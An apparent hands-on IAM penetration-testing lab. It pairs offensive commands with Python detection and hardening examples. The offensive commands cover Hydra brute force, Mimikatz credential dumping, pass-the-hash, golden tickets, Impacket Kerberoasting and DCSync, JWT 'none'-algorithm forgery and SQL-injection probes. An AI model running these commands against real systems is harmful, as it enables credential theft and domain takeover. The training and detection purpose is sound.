Lab Overview

This comprehensive lab exercise will guide you through conducting a complete IAM security assessment, including authentication testing, authorization bypass techniques, privilege escalation, and Active Directory penetration testing. You'll learn to identify and exploit common IAM vulnerabilities while understanding defensive strategies and mitigation techniques.

Duration: 6-8 hours
Difficulty: Intermediate
Prerequisites: Basic Windows/Linux knowledge, networking fundamentals
Environment: Windows Active Directory, Linux servers, web applications

🎯 Learning Objectives

๐Ÿ—๏ธ Lab Environment Setup

Prerequisites Installation

Required Tools:

  • Kali Linux or Windows with penetration testing tools
  • BloodHound and PowerView for AD enumeration
  • Mimikatz for credential extraction
  • Burp Suite Professional for web app testing
  • Postman for API testing
  • Impacket suite for network protocol testing

Environment Configuration

1. Set up Active Directory Lab

# Download and configure Windows Server 2019
# Install Active Directory Domain Services
Install-WindowsFeature -Name AD-Domain-Services -IncludeManagementTools

# Promote server to domain controller
Install-ADDSForest -DomainName "lab.local" -SafeModeAdministratorPassword (ConvertTo-SecureString "Admin123!" -AsPlainText -Force)

2. Configure Test Users and Groups

# Create test users with different privilege levels
New-ADUser -Name "testuser1" -SamAccountName "testuser1" -UserPrincipalName "testuser1@lab.local" -AccountPassword (ConvertTo-SecureString "Password123!" -AsPlainText -Force) -Enabled $true
# "adminuser" is the account added to Domain Admins below; it must exist first (password is a lab placeholder)
New-ADUser -Name "adminuser" -SamAccountName "adminuser" -UserPrincipalName "adminuser@lab.local" -AccountPassword (ConvertTo-SecureString "Password123!" -AsPlainText -Force) -Enabled $true

# Populate the privileged group
# "Domain Admins" is built in and already exists in a new forest, so do not re-create it with New-ADGroup (that call fails with "object already exists")
Add-ADGroupMember -Identity "Domain Admins" -Members "adminuser"

3. Set up Web Application Targets

# Deploy vulnerable web applications
# DVWA (Damn Vulnerable Web Application)
# WebGoat
# Juice Shop

📋 Lab Exercises

Exercise 1: Active Directory Enumeration

Objective

Enumerate Active Directory environment to understand domain structure, users, groups, and permissions.

Tasks

  1. Perform initial domain reconnaissance
  2. Enumerate domain users and groups
  3. Identify service accounts and privileged users
  4. Map group memberships and permissions
  5. Analyze domain trust relationships

PowerView Commands:

# Import PowerView
Import-Module .\PowerView.ps1

# Get domain information
Get-NetDomain

# Enumerate domain users
Get-NetUser | Select-Object samaccountname,description,lastlogon

# Get domain groups
Get-NetGroup | Select-Object samaccountname,description

# Find privileged groups
Get-NetGroupMember -GroupName "Domain Admins"
Get-NetGroupMember -GroupName "Enterprise Admins"

# Enumerate computers
Get-NetComputer | Select-Object samaccountname,operatingsystem

Exercise 2: Authentication Security Testing

Objective

Test authentication mechanisms for vulnerabilities and bypass techniques.

Tasks

  1. Perform password brute force attacks
  2. Test account lockout mechanisms
  3. Analyze authentication protocols
  4. Test multi-factor authentication bypass
  5. Examine session management security

Hydra Brute Force Example:

# SSH brute force attack
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target-ip

# SMB brute force attack
hydra -l administrator -P /usr/share/wordlists/rockyou.txt smb://target-ip

# Web form brute force (hydra takes the host before the module name; the form path, parameters and failure string are the module argument)
hydra -l admin -P /usr/share/wordlists/rockyou.txt -f target-ip http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid"
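The defensive counterpart to the brute-force step above is spotting it in the logs. The following is an added example, not part of the original lab: it parses OpenSSH `Failed password` lines (the sample lines are constructed, and the syslog year is assumed to be 2024 since syslog timestamps carry none) and flags any source address that accumulates five or more failures inside a sliding 60-second window. The threshold and window are assumptions to tune per environment; the same counting logic applies to SMB or web-form failures once their log lines are parsed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of OpenSSH auth.log lines (not real data).
SAMPLE_LOG = """\
Mar 10 14:02:01 web01 sshd[2211]: Failed password for admin from 203.0.113.5 port 51022 ssh2
Mar 10 14:02:03 web01 sshd[2213]: Failed password for admin from 203.0.113.5 port 51024 ssh2
Mar 10 14:02:04 web01 sshd[2215]: Failed password for invalid user root from 203.0.113.5 port 51026 ssh2
Mar 10 14:02:06 web01 sshd[2217]: Failed password for admin from 203.0.113.5 port 51028 ssh2
Mar 10 14:02:08 web01 sshd[2219]: Failed password for admin from 203.0.113.5 port 51030 ssh2
Mar 10 14:02:10 web01 sshd[2221]: Failed password for admin from 203.0.113.5 port 51032 ssh2
Mar 10 14:05:00 web01 sshd[2300]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Mar 10 14:05:30 web01 sshd[2302]: Accepted password for alice from 198.51.100.7 port 40002 ssh2
Mar 10 14:09:00 web01 sshd[2310]: Accepted publickey for deploy from 198.51.100.9 port 40100 ssh2
"""

# Matches both "Failed password for admin" and "Failed password for invalid user root".
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_failures(log_text, year=2024):
    """Return a list of (timestamp, username, source_ip) for every failed login.

    `year` is an assumption: syslog timestamps do not include one.
    """
    events = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["user"], m["src"]))
    return events


def find_bruteforce(events, max_failures=5, window_seconds=60):
    """Flag source IPs with >= max_failures failed logins inside any sliding window.

    Returns {src_ip: {"failures": peak count seen in one window, "users": targeted usernames}}.
    """
    by_src = defaultdict(list)
    for ts, user, src in events:
        by_src[src].append((ts, user))

    alerts = {}
    for src, attempts in by_src.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            # Slide the window start forward until attempts[start:end+1] fits in the window.
            while (attempts[end][0] - attempts[start][0]).total_seconds() > window_seconds:
                start += 1
            count = end - start + 1
            if count >= max_failures:
                alert = alerts.setdefault(src, {"failures": 0, "users": set()})
                alert["failures"] = max(alert["failures"], count)
                alert["users"].update(u for _, u in attempts[start:end + 1])

    return {src: {"failures": a["failures"], "users": sorted(a["users"])}
            for src, a in alerts.items()}


if __name__ == "__main__":
    for src, info in find_bruteforce(parse_failures(SAMPLE_LOG)).items():
        print(f"ALERT {src}: {info['failures']} failures in 60s, users={info['users']}")
```

Note that the single failure from 198.51.100.7 followed by a successful login is exactly the pattern of a user mistyping a password, and it is not flagged; the per-source sliding window is what separates that from the burst. The usual mitigations the lab's lockout task checks for (account lockout thresholds, per-source rate limiting, MFA) are what this detection is meant to back up, not replace.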

Exercise 3: Privilege Escalation Techniques

Objective

Execute privilege escalation attacks on Windows and Linux systems.

Tasks

  1. Perform Windows local privilege escalation
  2. Exploit Linux privilege escalation vectors
  3. Extract and crack password hashes
  4. Perform token impersonation attacks
  5. Exploit service account privileges

Mimikatz Credential Extraction:

# Load Mimikatz
mimikatz.exe

# Extract LSASS memory
sekurlsa::logonpasswords

# Extract Kerberos tickets
sekurlsa::tickets /export

# Pass-the-hash attack
sekurlsa::pth /user:admin /domain:lab.local /ntlm:hash /run:cmd.exe

# Golden Ticket creation
kerberos::golden /user:admin /domain:lab.local /sid:S-1-5-21-... /krbtgt:hash /ticket:golden.kirbi

Exercise 4: Active Directory Attack Techniques

Objective

Execute advanced Active Directory attack techniques including Kerberoasting and DCSync.

Tasks

  1. Perform Kerberoasting attacks
  2. Execute ASREPRoasting
  3. Perform DCSync attacks
  4. Exploit ACL-based privilege escalation
  5. Execute Golden Ticket and Silver Ticket attacks

Kerberoasting with Impacket:

# Request service tickets
python3 GetUserSPNs.py lab.local/testuser1:Password123! -dc-ip 192.168.1.10 -request

# Crack service tickets with Hashcat
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

# ASREPRoasting attack
python3 GetNPUsers.py lab.local/testuser1:Password123! -dc-ip 192.168.1.10 -request

# DCSync attack
python3 secretsdump.py lab.local/testuser1:Password123!@192.168.1.10
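Both Kerberoasting and DCSync leave a characteristic trace on the domain controller, and a blue team running alongside this exercise should be able to pick them up. The following is an added example, not part of the original lab or of the Impacket project: the event records are constructed samples shaped like Security log event 4769 (service ticket request, where an RC4 `TicketEncryptionType` of `0x17` for several distinct services in a short window is the Kerberoasting signature) and event 4662 (directory object access, where the `DS-Replication-Get-Changes` / `DS-Replication-Get-Changes-All` control-access GUIDs appearing in `Properties` for a principal that is not a domain controller is the DCSync signature). The thresholds, the five-minute window and the DC account names are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# 4769 TicketEncryptionType value for RC4-HMAC (AES128/AES256 are 0x11/0x12).
RC4_HMAC = "0x17"
# Control-access rights on the domain object that directory replication (and DCSync) requires.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}
GUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")

T0 = datetime(2024, 3, 10, 14, 0, 0)

# Constructed sample events (not a real log). Field names follow the Security log schema.
SAMPLE_EVENTS = [
    {"EventID": 4769, "Time": T0, "TargetUserName": "testuser1@LAB.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12"},
    {"EventID": 4769, "Time": T0 + timedelta(seconds=5), "TargetUserName": "testuser1@LAB.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": RC4_HMAC},
    {"EventID": 4769, "Time": T0 + timedelta(seconds=6), "TargetUserName": "testuser1@LAB.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": RC4_HMAC},
    {"EventID": 4769, "Time": T0 + timedelta(seconds=7), "TargetUserName": "testuser1@LAB.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": RC4_HMAC},
    # Normal user: one AES ticket for the web app she actually uses.
    {"EventID": 4769, "Time": T0 + timedelta(minutes=1), "TargetUserName": "alice@LAB.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x12"},
    # Legacy client still negotiating RC4 for a single service: stays below the threshold.
    {"EventID": 4769, "Time": T0 + timedelta(minutes=2), "TargetUserName": "legacyapp@LAB.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": RC4_HMAC},
    # Expected DC-to-DC replication.
    {"EventID": 4662, "Time": T0 + timedelta(minutes=3), "SubjectUserName": "DC02$",
     "ObjectName": "DC=lab,DC=local",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A user account exercising replication rights: the DCSync signature.
    {"EventID": 4662, "Time": T0 + timedelta(minutes=4), "SubjectUserName": "testuser1",
     "ObjectName": "DC=lab,DC=local", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def detect_kerberoasting(events, min_distinct_services=3, window=timedelta(minutes=5)):
    """Accounts that obtained RC4 service tickets for many distinct services within `window`.

    Returns {requesting account: sorted list of service accounts requested}.
    """
    by_user = defaultdict(list)
    for e in events:
        if e["EventID"] == 4769 and e["TicketEncryptionType"] == RC4_HMAC:
            by_user[e["TargetUserName"]].append((e["Time"], e["ServiceName"]))
    findings = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(services) >= min_distinct_services:
                findings[user] = sorted(services)
                break
    return findings


def detect_dcsync(events, domain_controllers):
    """4662 events in which a principal that is not a DC used a replication control-access right.

    Returns a list of (subject account, directory object) pairs.
    """
    dcs = {dc.upper() for dc in domain_controllers}
    hits = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        guids = {g.lower() for g in GUID_RE.findall(e["Properties"])}
        if guids & REPLICATION_GUIDS and e["SubjectUserName"].upper() not in dcs:
            hits.append((e["SubjectUserName"], e["ObjectName"]))
    return hits


if __name__ == "__main__":
    print("possible Kerberoasting:", detect_kerberoasting(SAMPLE_EVENTS))
    print("possible DCSync:", detect_dcsync(SAMPLE_EVENTS, {"DC01$", "DC02$"}))
```

The RC4 filter matters because tooling requests RC4 tickets by default to get a faster-to-crack hash, while domain-joined Windows clients normally negotiate AES; a service account configured for AES only and given a long random password (or converted to a group managed service account) removes most of the value of the ticket even when the request is not caught. For DCSync, the detection is only as good as the inventory of DC computer accounts passed in, and the corresponding preventive control is auditing which principals hold the replication rights on the domain head.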

Exercise 5: Web Application IAM Testing

Objective

Test web application identity and access management vulnerabilities.

Tasks

  1. Test authentication bypass techniques
  2. Perform authorization testing
  3. Test session management security
  4. Analyze JWT token security
  5. Test OAuth and SSO implementations

JWT Token Manipulation:

# Decode a JWT: the three base64url segments are dot-separated, so decode one segment at a time
# (piping the whole token into base64 -d fails on the dots)
TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
echo "$TOKEN" | cut -d. -f1 | base64 -d   # header: {"alg":"HS256","typ":"JWT"}
echo "$TOKEN" | cut -d. -f2 | base64 -d   # payload (append "=" padding if base64 complains about input length)

# Modify JWT payload
{
  "sub": "1234567890",
  "name": "John Doe",
  "role": "admin",
  "iat": 1516239022
}

# Test JWT signature bypass
# Try "none" algorithm
# Try weak secret keys
# Try algorithm confusion attacks
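The three signature checks listed above all come down to one server-side mistake: letting the token's own header decide how it is verified. The following is an added example, not code from the original lab; it uses only the Python standard library, and the key is a constructed test value. It shows a verifier that dispatches on the header's `alg` (and therefore accepts an unsigned `alg: none` token) beside a hardened verifier that pins HS256, compares the HMAC in constant time before trusting any claim, and enforces `exp`. The `unsigned_token` helper only exists to produce the negative test vector.

```python
import base64
import hashlib
import hmac
import json
import time


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    # JWT segments drop "=" padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _encode_part(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(payload: dict, key: bytes) -> str:
    """Issue a token the way the server should: fixed HS256 header, HMAC over header.payload."""
    signing_input = _encode_part({"alg": "HS256", "typ": "JWT"}) + "." + _encode_part(payload)
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def unsigned_token(payload: dict) -> str:
    """Negative test vector: header claims alg "none" and the signature segment is empty."""
    return _encode_part({"alg": "none", "typ": "JWT"}) + "." + _encode_part(payload) + "."


def verify_insecure(token: str, key: bytes) -> dict:
    """VULNERABLE pattern: the verifier dispatches on the alg the *client* put in the header."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":          # trusts the header, so unsigned tokens are accepted
        return json.loads(b64url_decode(p))
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p))


def verify_hs256(token: str, key: bytes, now=None) -> dict:
    """Hardened verifier: algorithm pinned server-side, constant-time signature check
    before any claim is trusted, and exp enforced."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    h, p, s = parts
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":          # rejects none, RS256->HS256 confusion, anything else
        raise ValueError("unexpected alg")
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    payload = json.loads(b64url_decode(p))
    now = time.time() if now is None else now
    if "exp" in payload and now >= payload["exp"]:
        raise ValueError("token expired")
    return payload


def accepts(verifier, token: str, key: bytes) -> bool:
    """True if `verifier` returns a payload for `token`, False if it rejects it."""
    try:
        verifier(token, key)
        return True
    except (ValueError, KeyError):            # binascii.Error and UnicodeDecodeError are ValueErrors
        return False


KEY = b"constructed-test-key-not-for-production"

if __name__ == "__main__":
    good = sign_hs256({"sub": "1234567890", "role": "user", "exp": 2000000000}, KEY)
    forged = unsigned_token({"sub": "1234567890", "role": "admin"})
    h, _, s = good.split(".")
    tampered = h + "." + _encode_part({"sub": "1234567890", "role": "admin", "exp": 2000000000}) + "." + s
    for name, tok in [("good", good), ("alg none", forged), ("tampered", tampered)]:
        print(f"{name:9s} insecure={accepts(verify_insecure, tok, KEY)} "
              f"hardened={accepts(verify_hs256, tok, KEY)}")
```

In a real service the pinned algorithm and key come from configuration, not from the token, and with an asymmetric algorithm the same rule applies: a verifier configured for RS256 must refuse an HS256 header outright rather than reuse the public key as an HMAC secret, which is the algorithm-confusion case the exercise names. The weak-secret case is handled outside the verifier, by generating the HMAC key with at least 256 bits of entropy.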

Exercise 6: API Security Testing

Objective

Test API authentication and authorization mechanisms.

Tasks

  1. Test API key security
  2. Analyze OAuth 2.0 implementations
  3. Test JWT token validation
  4. Perform authorization bypass testing
  5. Test rate limiting and throttling

API Testing with Postman:

# Test API endpoints without authentication
GET /api/users
Authorization: Bearer invalid_token

# Test with different user roles
GET /api/admin/users
Authorization: Bearer user_token

# Test parameter manipulation
GET /api/users?id=1
GET /api/users?id=1' OR '1'='1

# Test HTTP method bypass
POST /api/users (instead of GET)
PUT /api/users (instead of GET)
PATCH /api/users (instead of GET)
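Each request in the checklist above probes one missing server-side control: an absent or invalid bearer token, a role the endpoint does not allow, an `id` that belongs to someone else or carries SQL, and a method the route was never written for. The following is an added example, not from the original lab: a single request handler built on a default-deny `(method, path)` allowlist with a minimum role per route, an integer-only `id` parameter bound through a parameterised SQLite query, and an object-level ownership check for non-admins. The route table, roles and in-memory user table are constructed for illustration, and the handler takes the already-authenticated principal as an argument, so token validation itself is out of scope here.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Explicit (method, path) allowlist with the minimum role for each. Any combination
# not listed is refused, so POST/PUT/PATCH never fall through to the GET handler.
ROUTES = {
    ("GET", "/api/users"): "user",
    ("GET", "/api/admin/users"): "admin",
}
ROLE_RANK = {"user": 1, "admin": 2}
USER_COLUMNS = ("id", "name", "role")


def setup_db():
    """Constructed in-memory user table standing in for the application's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "user"), (2, "bob", "user"), (3, "root", "admin")])
    return db


def handle(db, method, url, user):
    """Authorize and serve one request. `user` is the authenticated principal
    ({"id": ..., "role": ...}) or None when no valid bearer token was presented.
    Returns (status, body)."""
    if user is None:
        return 401, {"error": "authentication required"}

    split = urlsplit(url)
    path, query = split.path, parse_qs(split.query)
    key = (method, path)
    if key not in ROUTES:
        if any(p == path for _, p in ROUTES):
            return 405, {"error": "method not allowed"}
        return 404, {"error": "not found"}

    # Function-level check: the caller's role must meet the route's minimum.
    if ROLE_RANK.get(user["role"], 0) < ROLE_RANK[ROUTES[key]]:
        return 403, {"error": "forbidden"}

    if path == "/api/admin/users":
        rows = db.execute("SELECT id, name, role FROM users").fetchall()
        return 200, [dict(zip(USER_COLUMNS, r)) for r in rows]

    # /api/users: an optional ?id= selects one record.
    raw_id = query.get("id", [None])[0]
    if raw_id is None:
        rows = db.execute("SELECT id, name FROM users").fetchall()
        return 200, [{"id": i, "name": n} for i, n in rows]
    if not raw_id.isdigit():
        return 400, {"error": "id must be an integer"}   # "1' OR '1'='1" stops here, before any SQL
    uid = int(raw_id)
    # Object-level check: non-admins may only read their own record.
    if user["role"] != "admin" and uid != user["id"]:
        return 403, {"error": "forbidden"}
    # Parameterised query: the value is bound, never interpolated into the SQL text.
    row = db.execute("SELECT id, name, role FROM users WHERE id = ?", (uid,)).fetchone()
    if row is None:
        return 404, {"error": "not found"}
    return 200, dict(zip(USER_COLUMNS, row))


if __name__ == "__main__":
    db = setup_db()
    alice = {"id": 1, "role": "user"}
    for method, url, who in [("GET", "/api/users", None),
                             ("GET", "/api/admin/users", alice),
                             ("GET", "/api/users?id=2", alice),
                             ("GET", "/api/users?id=1' OR '1'='1", alice),
                             ("PUT", "/api/users", alice)]:
        print(method, url, "->", handle(db, method, url, who))
```

Returning 403 rather than 404 for another user's record is a deliberate choice here; some services prefer 404 to avoid confirming that the id exists, and either is acceptable as long as the check happens before the query result is serialised. Rate limiting, the last item in the task list, sits in front of this handler (per token and per source address) rather than inside it.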

🧪 Lab Validation

Security Assessment Checklist

Assessment Metrics

  • Vulnerabilities found: target > 10 critical/high
  • Privilege escalation success: target > 80%
  • Domain compromise: target domain admin access
  • Credential extraction: target > 50% of accounts

📚 Additional Resources
